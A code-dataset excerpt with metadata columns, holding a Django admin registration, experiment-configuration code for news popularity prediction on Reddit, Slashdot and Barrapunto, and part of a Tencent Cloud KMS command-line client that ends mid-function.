] | 2 | 2019-04-09T16:23:22.000Z | 2022-01-27T19:13:19.000Z | from django.contrib import admin
from .models import Setor, Coordenadoria, Vinculo
# Register your models here.
admin.site.register([Setor, Coordenadoria, Vinculo])
| 23.857143 | 52 | 0.796407 | 21 | 167 | 6.333333 | 0.619048 | 0.270677 | 0.37594 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11976 | 167 | 6 | 53 | 27.833333 | 0.904762 | 0.155689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c7e4a1f6d1992bd14a0bcdefc2813e98e73c25e6 | 39,038 | py | Python | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | MKLab-ITI/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 33 | 2016-01-25T01:21:36.000Z | 2021-08-04T09:09:13.000Z | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | twishmay/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 1 | 2018-03-06T16:30:08.000Z | 2018-03-06T16:30:08.000Z | news_popularity_prediction/entry_points/snow_2016_workshop/experiment_configurations.py | twishmay/news-popularity-prediction | 5f66982c659de017665116297bb4fd29ca13f835 | [
"Apache-2.0"
] | 15 | 2016-03-22T00:45:41.000Z | 2022-02-08T03:08:52.000Z | __author__ = 'Georgios Rizos (georgerizos@iti.gr)'
from news_popularity_prediction.learning.single_experiment import DiscussionModellingExperiment
def reddit_news_experiments(data_folder):
    """Run the full battery of discussion-modelling experiments on the Reddit news dataset.

    Eleven experiments are executed in a fixed order:
      1-6: feature-free baselines ("mean", "median", "comments", "users",
           "comments_users", "simple graph"),
      7-10: single/paired feature-group ablations (branching, user-graph,
            temporal),
      11: all three feature groups combined.

    Each experiment targets the Reddit OSN for both features and prediction
    targets ("comments", "users", "score_wilson", "controversiality_wilson")
    with 10-fold evaluation.

    Parameters
    ----------
    data_folder : str
        Root data directory; the Reddit dataset is expected under
        ``data_folder + "/reddit"``.
    """
    reddit_data_folder = data_folder + "/reddit"
    feature_osn_name_list = ["reddit"]
    target_osn_name = "reddit"  # OSN targets.
    osn_name_focus = "reddit"  # OSN-based timestamps.
    target_name_list = ["comments", "users", "score_wilson", "controversiality_wilson"]
    number_of_folds = 10

    # Each tuple: (add_branching_features, add_usergraph_features,
    #              add_temporal_features, baseline-or-None).
    # A None baseline means the "baseline" key is omitted entirely, matching
    # the feature-based (non-baseline) experiment configurations.
    experiment_setups = [
        (False, False, False, "mean"),
        (False, False, False, "median"),
        (False, False, False, "comments"),
        (False, False, False, "users"),
        (False, False, False, "comments_users"),
        (False, False, False, "simple graph"),
        (True, True, False, None),
        (True, False, False, None),
        (False, True, False, None),
        (False, False, True, None),
        (True, True, True, None),
    ]

    for add_branching, add_usergraph, add_temporal, baseline in experiment_setups:
        experiment_construction_dict = {
            "add_branching_features": add_branching,
            "add_usergraph_features": add_usergraph,
            "add_temporal_features": add_temporal,
        }
        if baseline is not None:
            experiment_construction_dict["baseline"] = baseline

        # Pass fresh list copies so a mutating experiment cannot leak state
        # into subsequent runs (the original code built new literals each time).
        experiment = DiscussionModellingExperiment(
            experiment_construction_dict=experiment_construction_dict,
            data_folder=reddit_data_folder,
            feature_osn_name_list=list(feature_osn_name_list),
            target_osn_name=target_osn_name,
            osn_name_focus=osn_name_focus,
            target_name_list=list(target_name_list),
            number_of_folds=number_of_folds)
        experiment.do_experiment()
def slashdot_experiments(data_folder):
    """Run the full battery of discussion-modelling experiments on the Slashdot dataset.

    Executes, in order: five trivial baselines (mean, median, comments, users,
    comments_users), the "simple graph" baseline, and five feature-combination
    runs (branching/usergraph/temporal features toggled individually and all
    together). Each run constructs a ``DiscussionModellingExperiment`` and
    calls ``do_experiment()``.

    Parameters
    ----------
    data_folder : str
        Root data directory; the Slashdot data lives under ``data_folder + "/slashdot"``.
    """
    DATA_FOLDER = data_folder + "/slashdot"
    FEATURE_OSN_NAME_LIST = ["slashdot"]
    TARGET_OSN_NAME = "slashdot"  # OSN targets.
    OSN_NAME_FOCUS = "slashdot"  # OSN-based timestamps.
    TARGET_NAME_LIST = ["comments", "users"]
    NUMBER_OF_FOLDS = 10

    # Each tuple: (add_branching_features, add_usergraph_features,
    #              add_temporal_features, baseline-or-None).
    # Order matches the original sequence of experiment runs exactly.
    # NOTE(review): the original "simple graph" stanza also defined
    # HANDCRAFTED_FEATURES_DIMENSIONALITY / BIPARTITE_GRAPH_FEATURES_DIMENSIONALITY
    # but never passed them to the experiment; those dead locals are dropped here.
    configurations = [
        (False, False, False, "mean"),
        (False, False, False, "median"),
        (False, False, False, "comments"),
        (False, False, False, "users"),
        (False, False, False, "comments_users"),
        (False, False, False, "simple graph"),
        (True, True, False, None),
        (True, False, False, None),
        (False, True, False, None),
        (False, False, True, None),
        (True, True, True, None),
    ]

    for add_branching, add_usergraph, add_temporal, baseline in configurations:
        EXPERIMENT_CONSTRUCTION_TYPE = dict()
        EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = add_branching
        EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = add_usergraph
        EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = add_temporal
        if baseline is not None:
            EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = baseline

        experiment = DiscussionModellingExperiment(
            experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
            data_folder=DATA_FOLDER,
            feature_osn_name_list=FEATURE_OSN_NAME_LIST,
            target_osn_name=TARGET_OSN_NAME,
            osn_name_focus=OSN_NAME_FOCUS,
            target_name_list=TARGET_NAME_LIST,
            number_of_folds=NUMBER_OF_FOLDS,
        )
        experiment.do_experiment()
def barrapunto_experiments(data_folder):
    """Run the full battery of discussion-modelling experiments on the Barrapunto dataset.

    Executes, in order: five trivial baselines (mean, median, comments, users,
    comments_users), the "simple graph" baseline, and five feature-combination
    runs (branching/usergraph/temporal features toggled individually and all
    together). Each run constructs a ``DiscussionModellingExperiment`` and
    calls ``do_experiment()``.

    Parameters
    ----------
    data_folder : str
        Root data directory; the Barrapunto data lives under
        ``data_folder + "/barrapunto"``. Note the feature/target OSN names are
        "slashdot" — Barrapunto is a Slashdot-style site and reuses that schema.
    """
    DATA_FOLDER = data_folder + "/barrapunto"
    FEATURE_OSN_NAME_LIST = ["slashdot"]
    TARGET_OSN_NAME = "slashdot"  # OSN targets.
    OSN_NAME_FOCUS = "slashdot"  # OSN-based timestamps.
    TARGET_NAME_LIST = ["comments", "users"]
    NUMBER_OF_FOLDS = 10

    # Each tuple: (add_branching_features, add_usergraph_features,
    #              add_temporal_features, baseline-or-None).
    # Order matches the original sequence of experiment runs exactly.
    configurations = [
        (False, False, False, "mean"),
        (False, False, False, "median"),
        (False, False, False, "comments"),
        (False, False, False, "users"),
        (False, False, False, "comments_users"),
        (False, False, False, "simple graph"),
        (True, True, False, None),
        (True, False, False, None),
        (False, True, False, None),
        (False, False, True, None),
        (True, True, True, None),
    ]

    for add_branching, add_usergraph, add_temporal, baseline in configurations:
        EXPERIMENT_CONSTRUCTION_TYPE = dict()
        EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = add_branching
        EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = add_usergraph
        EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = add_temporal
        if baseline is not None:
            EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = baseline

        experiment = DiscussionModellingExperiment(
            experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
            data_folder=DATA_FOLDER,
            feature_osn_name_list=FEATURE_OSN_NAME_LIST,
            target_osn_name=TARGET_OSN_NAME,
            osn_name_focus=OSN_NAME_FOCUS,
            target_name_list=TARGET_NAME_LIST,
            number_of_folds=NUMBER_OF_FOLDS,
        )
        experiment.do_experiment()
| 50.436693 | 105 | 0.607306 | 3,612 | 39,038 | 6.0299 | 0.016888 | 0.095455 | 0.218457 | 0.131818 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0 | 0.002641 | 0.330627 | 39,038 | 773 | 106 | 50.50194 | 0.830852 | 0.029561 | 0 | 0.988691 | 0 | 0 | 0.113917 | 0.063411 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004847 | false | 0 | 0.001616 | 0 | 0.006462 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
400201dbac9e5ac09d3d9cec4c0cc0fe06c52772 | 66,239 | py | Python | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.kms.v20190118 import kms_client as kms_client_v20190118
from tencentcloud.kms.v20190118 import models as models_v20190118
def doDeleteImportedKeyMaterial(args, parsed_globals):
    """CLI action handler: invoke the KMS ``DeleteImportedKeyMaterial`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].DeleteImportedKeyMaterialRequest()
    request.from_json_string(json.dumps(args))
    result = client.DeleteImportedKeyMaterial(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEncrypt(args, parsed_globals):
    """CLI action handler: invoke the KMS ``Encrypt`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].EncryptRequest()
    request.from_json_string(json.dumps(args))
    result = client.Encrypt(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableWhiteBoxKeys(args, parsed_globals):
    """CLI action handler: invoke the KMS ``EnableWhiteBoxKeys`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].EnableWhiteBoxKeysRequest()
    request.from_json_string(json.dumps(args))
    result = client.EnableWhiteBoxKeys(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateAlias(args, parsed_globals):
    """CLI action handler: invoke the KMS ``UpdateAlias`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].UpdateAliasRequest()
    request.from_json_string(json.dumps(args))
    result = client.UpdateAlias(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWhiteBoxKey(args, parsed_globals):
    """CLI action handler: invoke the KMS ``DeleteWhiteBoxKey`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].DeleteWhiteBoxKeyRequest()
    request.from_json_string(json.dumps(args))
    result = client.DeleteWhiteBoxKey(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportKeyMaterial(args, parsed_globals):
    """CLI action handler: invoke the KMS ``ImportKeyMaterial`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].ImportKeyMaterialRequest()
    request.from_json_string(json.dumps(args))
    result = client.ImportKeyMaterial(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetPublicKey(args, parsed_globals):
    """CLI action handler: invoke the KMS ``GetPublicKey`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].GetPublicKeyRequest()
    request.from_json_string(json.dumps(args))
    result = client.GetPublicKey(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKey(args, parsed_globals):
    """CLI action handler: invoke the KMS ``DisableKey`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].DisableKeyRequest()
    request.from_json_string(json.dumps(args))
    result = client.DisableKey(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGenerateDataKey(args, parsed_globals):
    """CLI action handler: invoke the KMS ``GenerateDataKey`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].GenerateDataKeyRequest()
    request.from_json_string(json.dumps(args))
    result = client.GenerateDataKey(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAsymmetricSm2Decrypt(args, parsed_globals):
    """CLI action handler: invoke the KMS ``AsymmetricSm2Decrypt`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].AsymmetricSm2DecryptRequest()
    request.from_json_string(json.dumps(args))
    result = client.AsymmetricSm2Decrypt(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSignByAsymmetricKey(args, parsed_globals):
    """CLI action handler: invoke the KMS ``SignByAsymmetricKey`` API."""
    g_param = parse_global_arg(parsed_globals)

    # Build credentials from the resolved global parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )

    # Request timeout defaults to 60 seconds unless overridden on the CLI.
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].KmsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)

    # Round-trip the CLI args through JSON into the request model.
    request = MODELS_MAP[version].SignByAsymmetricKeyRequest()
    request.from_json_string(json.dumps(args))
    result = client.SignByAsymmetricKey(request).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCancelKeyDeletion(args, parsed_globals):
    """Call the KMS CancelKeyDeletion API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a CancelKeyDeletionRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CancelKeyDeletionRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CancelKeyDeletion(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetKeyRotationStatus(args, parsed_globals):
    """Call the KMS GetKeyRotationStatus API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a GetKeyRotationStatusRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.GetKeyRotationStatusRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.GetKeyRotationStatus(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxKeyDetails(args, parsed_globals):
    """Call the KMS DescribeWhiteBoxKeyDetails API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a DescribeWhiteBoxKeyDetailsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeWhiteBoxKeyDetailsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeWhiteBoxKeyDetails(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBindCloudResource(args, parsed_globals):
    """Call the KMS BindCloudResource API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a BindCloudResourceRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.BindCloudResourceRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.BindCloudResource(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
